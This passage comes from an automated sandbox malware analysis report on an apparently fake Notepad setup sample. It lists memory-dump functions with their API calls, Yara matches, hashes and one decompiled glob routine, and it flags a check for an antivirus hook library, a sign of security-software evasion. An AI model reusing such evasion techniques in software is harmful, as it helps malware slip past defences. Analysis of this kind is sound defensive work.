                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcessmemcpy
                                      • String ID:
                                      • API String ID: 4164033339-0
                                      • Opcode ID: f9355fd1d6cb5f3e9e3ccd460e7d80cdd41cf23e1272aedace0434c5151d0ab9
                                      • Instruction ID: 57dd651ea404dfa0c4e5e640fdbf5a5b3f1c24d7e19b008a0f3ec1f6c98b9393
                                      • Opcode Fuzzy Hash: f9355fd1d6cb5f3e9e3ccd460e7d80cdd41cf23e1272aedace0434c5151d0ab9
                                      • Instruction Fuzzy Hash: 2F31A2B05087029FD710EF29C58461EBBE4AF84348F41892EE8C8AB361EB78D945DB46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F141E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket$shutdown
                                      • String ID: h9n
                                      • API String ID: 3079814495-487293551
                                      • Opcode ID: afd15894b49a43c192314b43fae093e56a7ed25035fecae8358accce5fbd8aca
                                      • Instruction ID: 78bd824f00240d2d7ec5326c28526ee066e48dfed5b3c2595f70419508900c21
                                      • Opcode Fuzzy Hash: afd15894b49a43c192314b43fae093e56a7ed25035fecae8358accce5fbd8aca
                                      • Instruction Fuzzy Hash: 0B412B71500B0ACFDB358F29C444BB6B7F2AB923A9F14961DDA928A691C334E846CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E2975 Relevance: 6.1, APIs: 4, Instructions: 110stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@mallocmemcpystrlen
                                      • String ID:
                                      • API String ID: 2100618974-0
                                      • Opcode ID: e25ca7f6b44be2508764e378cd1540d32f8921e841a785287acc862a48fdb544
                                      • Instruction ID: 0ae76ba510b3b09b6e63e8c2d76d0db5815f2da18d3fd2408d14366ffa2e9567
                                      • Opcode Fuzzy Hash: e25ca7f6b44be2508764e378cd1540d32f8921e841a785287acc862a48fdb544
                                      • Instruction Fuzzy Hash: 33416A71D0025AAFDB20CF6AD8905AEBBBAFF04350F248569E855E7241D334AE51CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407938 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 240b0d1e2ca166af3b9d631e2e48b326c87ccd1bddd120d57ad96e5237f0e7c2
                                      • Instruction ID: 2aebc01110d2851785a03ebda5ab5968bd10462250f2fe1a6ceca96ee5b5aa37
                                      • Opcode Fuzzy Hash: 240b0d1e2ca166af3b9d631e2e48b326c87ccd1bddd120d57ad96e5237f0e7c2
                                      • Instruction Fuzzy Hash: D2311A71D093158FDB20DF25C8453DAF7F1AB85314F15C4AED988A3241E7386A85CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407ADC Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 59d4162acc48f1005c4382b64dac0216b636a75d04a7b3129c4de15ac8a63ad7
                                      • Instruction ID: 6fd72f4b5ddff795ec0aed5361a17431d07769f91e5ce3c346ebaf1c4d7576e1
                                      • Opcode Fuzzy Hash: 59d4162acc48f1005c4382b64dac0216b636a75d04a7b3129c4de15ac8a63ad7
                                      • Instruction Fuzzy Hash: A9216971D093158FDB20DF24C8843DAB7F1AF85304F14C4AED988A3281E739AA85CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407AF7 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID:
                                      • API String ID: 2400198430-0
                                      • Opcode ID: 9a153f24a2da6b53a8b2af1a0759da1aec0ff79c7c852294654ee214e4006ca0
                                      • Instruction ID: 161d899167e9a33e548d1e7e96ae793a37da8539009942bf9e761556852837fc
                                      • Opcode Fuzzy Hash: 9a153f24a2da6b53a8b2af1a0759da1aec0ff79c7c852294654ee214e4006ca0
                                      • Instruction Fuzzy Hash: 36215C72D083158FDB20DF24C84579AB7F0AB45304F1484AED988A3281E738A985CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0EFE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSARecv.WS2_32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006F1004
                                      • WSAGetLastError.WS2_32 ref: 006F10B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRecv
                                      • String ID: E'
                                      • API String ID: 904507345-3751625834
                                      • Opcode ID: 3c6ea7f7cf3a6b3f38be39c8da817c8d227e5a971bfc84c0eb8cbf07ab1f9e06
                                      • Instruction ID: 3dc845730622590f8ffe674ad75a42d644e7e3079c070d8d0d802d71128aca0c
                                      • Opcode Fuzzy Hash: 3c6ea7f7cf3a6b3f38be39c8da817c8d227e5a971bfc84c0eb8cbf07ab1f9e06
                                      • Instruction Fuzzy Hash: 0B817E70504708EFEB318F14C841AFA77B6EF063A4F00461EEF569A791D731EA868B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 62%
                                      			E00409630(signed char* _a4, signed int _a8, signed int _a12, char** _a16) {
				void* _v16;
				signed char** _v32;
				intOrPtr _v36;
				signed char** _v40;
				char _v56;
				signed char** _t25;
				void* _t31;
				char* _t32;
				signed int _t33;
				intOrPtr _t34;
				signed int _t36;
				signed char* _t39;
				signed char** _t41;
				signed char** _t42;
				char* _t44;
				signed int _t46;
				signed char* _t48;
				char** _t49;
				signed char** _t50;
				intOrPtr* _t51;

				_t49 = _a16;
				_t39 = _a4;
				_t46 = _a8;
				if(_t49 != 0 && (_t46 & 0x00000002) == 0) {
					_t49[3] = 0;
				}
				if( *_t49 != "glob-1.0-mingw32") {
					E00408D40(_t49);
					 *_t49 = "glob-1.0-mingw32";
				}
				 *_t50 = _t49;
				_t25 = E00408D90(_t39, _a12, _t46); // executed
				_t41 = _t25;
				if(_t25 == 2) {
					if((_t46 & 0x00000010) == 0) {
						goto L5;
					}
					_v40 = _t25;
					_v32 = _t50;
					 *_t50 = _t39;
					_t31 = E00408390(strlen(??) + 0x10 >> 4 << 4);
					_t42 = _v40;
					_t51 = _t50 - _t31;
					_t32 =  &_v56;
					_v36 = _t32;
					_t44 = _t32;
					while(1) {
						L10:
						_t33 =  *_t39 & 0x000000ff;
						_t15 =  &(_t39[1]); // 0x2
						_t48 = _t15;
						if(_t33 == 0x7f) {
							break;
						}
						_t44 = _t44 + 1;
						_t39 = _t48;
						 *(_t44 - 1) = _t33;
						if(_t33 == 0) {
							L12:
							_t34 = _v36;
							_v40 = _t42;
							 *_t51 = _t34;
							L00408484();
							_t41 = _v40;
							if(_t34 != 0) {
								_v32 = _t41;
								E00408C90(_t34, _t49);
								_t41 = _v32;
							}
							goto L5;
						}
					}
					_t36 = _t39[1] & 0x000000ff;
					_t44 = _t44 + 1;
					_t39 =  &(_t39[2]);
					 *(_t44 - 1) = _t36;
					if(_t36 != 0) {
						goto L10;
					}
					goto L12;
				} else {
					L5:
					return _t41;
				}
			}























                                      0x00409639
                                      0x0040963c
                                      0x0040963f
                                      0x00409644
                                      0x00409688
                                      0x00409688
                                      0x00409654
                                      0x00409658
                                      0x0040965d
                                      0x0040965d
                                      0x00409663
                                      0x0040966d
                                      0x00409672
                                      0x00409677
                                      0x0040969b
                                      0x00000000
                                      0x00000000
                                      0x0040969d
                                      0x004096a0
                                      0x004096a3
                                      0x004096b4
                                      0x004096b9
                                      0x004096bc
                                      0x004096be
                                      0x004096c2
                                      0x004096c5
                                      0x004096dc
                                      0x004096dc
                                      0x004096dc
                                      0x004096df
                                      0x004096df
                                      0x004096e4
                                      0x00000000
                                      0x00000000
                                      0x004096d0
                                      0x004096d3
                                      0x004096d5
                                      0x004096da
                                      0x004096f7
                                      0x004096f7
                                      0x004096fa
                                      0x004096fd
                                      0x00409700
                                      0x00409708
                                      0x0040970d
                                      0x00409715
                                      0x00409718
                                      0x0040971d
                                      0x0040971d
                                      0x00000000
                                      0x0040970d
                                      0x004096da
                                      0x004096e6
                                      0x004096ea
                                      0x004096ed
                                      0x004096f0
                                      0x004096f5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409679
                                      0x00409679
                                      0x00409682
                                      0x00409682

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: glob-1.0-mingw32
                                      • API String ID: 0-3253302226
                                      • Opcode ID: cec649cc26a9885d7be978dd14e3742b99c06c2a3be695d6a58628a145e5c2ae
                                      • Instruction ID: e3485a9147cbcf2fb15ffac92ca879753b65b567904ce85274ccf2315b4c24a6
                                      • Opcode Fuzzy Hash: cec649cc26a9885d7be978dd14e3742b99c06c2a3be695d6a58628a145e5c2ae
                                      • Instruction Fuzzy Hash: E521B171E053198BCB14DF6994416AEB7F5AF84304F18497FD881BB382DA7A9C01CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC89B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(aswhook.dll), ref: 006EC8A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: \GLOBAL??$aswhook.dll
                                      • API String ID: 4139908857-1337116160
                                      • Opcode ID: 420cea5b78d7db836c8791d37ab24c6f32396eddb8b0d02065c2592284e03c30
                                      • Instruction ID: 53429b815e66666da551f7bb4147a32c71492daaf57c63975544c4b10c2b52b1
                                      • Opcode Fuzzy Hash: 420cea5b78d7db836c8791d37ab24c6f32396eddb8b0d02065c2592284e03c30
                                      • Instruction Fuzzy Hash: 6EE0C231791309B7DB1087A19D03BFE36AEAB00B68F10446AB901F20C0DAF4DA409A25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6362 Relevance: 5.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • memmove.NTDLL(?,?,?,?,?,?,006E3C5D,?,?), ref: 006E63A8
                                      • malloc.MSVCRT ref: 006E63C4
                                      • memcpy.NTDLL(0000000C,?,?,?,006E3C5D,?,?), ref: 006E63E1
                                      • malloc.MSVCRT ref: 006E6401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: malloc$memcpymemmove
                                      • String ID:
                                      • API String ID: 25407478-0
                                      • Opcode ID: 9b268af47d653a36f33a6e737737bbdb0741c61310c953627d5e8756ffea9dc5
                                      • Instruction ID: da4258da84df8f43d01272201d62c5048745c018aebeeb6bbf4e1bac43323cd2
                                      • Opcode Fuzzy Hash: 9b268af47d653a36f33a6e737737bbdb0741c61310c953627d5e8756ffea9dc5
                                      • Instruction Fuzzy Hash: 2C215776601B029FCB20CF6AC48489AF7E7EF98350725C92EE49A97640E730A805CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0A83 Relevance: 4.6, APIs: 3, Instructions: 136COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d8fc265e05926a88b94d73af50bb72985b76bf8aa7005023fb3a98aa3eaeefe
                                      • Instruction ID: 63ff7465b006aff98f0f6a4f723aa2b25fd7b24bb46e3edb03bfd6b8df171079
                                      • Opcode Fuzzy Hash: 0d8fc265e05926a88b94d73af50bb72985b76bf8aa7005023fb3a98aa3eaeefe
                                      • Instruction Fuzzy Hash: 67417DB15002099FEB54CF25D881BB2B7AAFF05318F1485A9EE198F357DB71E801CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409CA0 Relevance: 4.6, APIs: 3, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindLastNext_errno
                                      • String ID:
                                      • API String ID: 2804278807-0
                                      • Opcode ID: 04782325db604b174c9622ac62b7e70836297f19bbba73e6c6bfed7312207271
                                      • Instruction ID: a1022e6531552ade64d474ebf65b57f5a8f5eb5a00d102be54bb6ddfabf16913
                                      • Opcode Fuzzy Hash: 04782325db604b174c9622ac62b7e70836297f19bbba73e6c6bfed7312207271
                                      • Instruction Fuzzy Hash: 5C11CA711083914ADF509F29BC812A6B790EF41355F488877EC94DF387D53CC849C3A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E3721 Relevance: 4.0, APIs: 3, Instructions: 200COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E64D1: ??3@YAXPAX@Z.MSVCRT ref: 006E64E8
                                        • Part of subcall function 006E64D1: ??3@YAXPAX@Z.MSVCRT ref: 006E64FE
                                      • memcmp.NTDLL ref: 006E38F7
                                      • calloc.MSVCRT ref: 006E3907
                                      • memcpy.NTDLL(00000000,?,00000000), ref: 006E3925
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$callocmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 3216597913-0
                                      • Opcode ID: 5f7093a6be423a83406d00363e40055e1ce63d68559d983d5d8cc19bc5635aa1
                                      • Instruction ID: 4f04cd2b2cec72a14d38e17af7678b2c13c77a6b984f576b92ccba4b985d14a8
                                      • Opcode Fuzzy Hash: 5f7093a6be423a83406d00363e40055e1ce63d68559d983d5d8cc19bc5635aa1
                                      • Instruction Fuzzy Hash: 8461CDB28063D49ACF21DBA1CC8DEEA77BFAF04310F54056AF54597282E731DA45CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F1346 Relevance: 3.1, APIs: 2, Instructions: 86networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 006F139A
                                      • WSAGetLastError.WS2_32(?,006EF791,00000000,00000000,?,00000000,00000000,00000000,006EF60C,00000000,?,00000000,006E2DE3,?,00000000,?), ref: 006F13C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastsetsockopt
                                      • String ID:
                                      • API String ID: 1729277954-0
                                      • Opcode ID: dcfddf23f4705b6a150ad8ab52c5f76e528a74516713e19e788cc97864dfbd0a
                                      • Instruction ID: 6db089ef4da11ed177d5738a3ed84ca9947c7dd66bbd802a3349ccdbad1692d1
                                      • Opcode Fuzzy Hash: dcfddf23f4705b6a150ad8ab52c5f76e528a74516713e19e788cc97864dfbd0a
                                      • Instruction Fuzzy Hash: 2B315E71604609EFDB20DF25C841E76B7B9FF0A7A4B008629FE5A9BB51C730F8158B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E4099 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset
                                      • String ID: QAn
                                      • API String ID: 2221118986-3512184718
                                      • Opcode ID: 6196429a8755ee52fa887eef167a514ac7cf9366284b490a6dcdbf547cd1c2a6
                                      • Instruction ID: e42e07dc8688e566749855bc2bb71f6fb6ff4031f37ac0fd19d07225584d575d
                                      • Opcode Fuzzy Hash: 6196429a8755ee52fa887eef167a514ac7cf9366284b490a6dcdbf547cd1c2a6
                                      • Instruction Fuzzy Hash: BF21C671902359ABCF10CF66DC84AEF777AEB40324F104226F961A72C0D7749A59CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004085E0 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errnorealloc
                                      • String ID:
                                      • API String ID: 3650671883-0
                                      • Opcode ID: f83c382b9c0e211f7473ffc2f123d40eebd65c7e53d05c29288505838aa9bfea
                                      • Instruction ID: 0fb9360118e1c37cb4c144194b2d3137b780c5e6dfd278c6b2ffd212d18ac402
                                      • Opcode Fuzzy Hash: f83c382b9c0e211f7473ffc2f123d40eebd65c7e53d05c29288505838aa9bfea
                                      • Instruction Fuzzy Hash: 53014BB2A0A3108BD760AF69BAC105EFBE4EF88750F455D3FF88457245C67588818B97
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E403A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • malloc.MSVCRT ref: 006E4054
                                        • Part of subcall function 006E4099: memset.NTDLL ref: 006E40B4
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E408C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@mallocmemset
                                      • String ID:
                                      • API String ID: 2973997714-0
                                      • Opcode ID: 3db1b51620bcd2d9b97ed57dfccbb188cd27e5c49220050bee32832bf56e1982
                                      • Instruction ID: f3596e04fa5941eb3f947f120a229cceab356ba1e3a7a5975cbb35c7d0438e93
                                      • Opcode Fuzzy Hash: 3db1b51620bcd2d9b97ed57dfccbb188cd27e5c49220050bee32832bf56e1982
                                      • Instruction Fuzzy Hash: EF0131765017069FC7149F7AD84489BB7EEEB88350314843EEB5AC7700FB31E9408B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E64D1 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: f89bfc6596a7e76439bf99b8a0c06a625b2f5ea7c1229271ef8fb7566e23c761
                                      • Instruction ID: fee6394ebe54f2d206b503ebf084cf508a951ad1c931ad4ef100f5fd530863fe
                                      • Opcode Fuzzy Hash: f89bfc6596a7e76439bf99b8a0c06a625b2f5ea7c1229271ef8fb7566e23c761
                                      • Instruction Fuzzy Hash: C6F0A276201741DBC721CF4ED840A56B3EAEFD83A1725442DF594C7350D770E844CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E488A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: malloc
                                      • String ID: MGn
                                      • API String ID: 2803490479-2452705820
                                      • Opcode ID: 2638b44a310262308b0a12379aad5a477196c57a5541af5157de4cd835011ba0
                                      • Instruction ID: f0dfcb775c5dbed32d71be015a31d33c64219eb64234a8ea0c0ab1db5545eeef
                                      • Opcode Fuzzy Hash: 2638b44a310262308b0a12379aad5a477196c57a5541af5157de4cd835011ba0
                                      • Instruction Fuzzy Hash: DCF0D4B56063499FDF098F65D8549AA3BA6FF48310B05806DFD098B761DB31E820DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409FB0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNEL32(?,?,?,?,?,00409440), ref: 00409FC5
                                        • Part of subcall function 00408660: free.MSVCRT ref: 0040867A
                                      • _errno.MSVCRT ref: 00409FE0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
